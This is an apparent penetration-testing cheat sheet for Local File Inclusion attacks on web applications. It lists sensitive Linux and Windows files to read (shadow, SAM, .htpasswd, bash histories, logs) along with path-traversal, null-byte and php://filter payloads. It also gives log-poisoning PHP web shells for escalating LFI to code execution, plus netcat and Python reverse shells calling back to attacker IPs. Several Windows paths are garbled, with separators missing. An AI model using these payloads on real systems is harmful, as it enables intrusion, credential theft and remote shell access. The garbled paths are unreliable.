LFI
LFI Windows Files:
%SYSTEMROOT%repairsystem
%SYSTEMROOT%repairSAM
%SYSTEMROOT%repairSAM
%WINDIR%win.ini
%SYSTEMDRIVE%boot.ini
%WINDIR%Panthersysprep.inf
%WINDIR%system32congAppEvent.Evt
LFI Linux Files:
/etc/issue
/proc/version
/etc/prole
/etc/passwd
/etc/passwd
/etc/shadow
h t t p:// $ i p / i n d e x.p h p ? p a g e = / e t c / p a s s w d
:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,
Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>
http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd
192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd
192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt
username=%0A/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
curl -d "image=/etc/passwd" https://ip:15020/blog/download.php -k
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://ip/administrator/alerts/alertConfigField.php
http://192.168.1.145/index.php?page=../../../../../../../../../etc/passwd%00
text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File
LFI
http://example.com/page=../../../../../../etc/passwd%00
#bypass
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
# First we save the cookie
curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile
Linux LFI
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
#log
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access. log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
#windows
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
Host: 192.168.1.159
Connection: close
nc ip 80
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close
nc ip 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close
#sensitive
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
LFI to RCE
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls
Last updated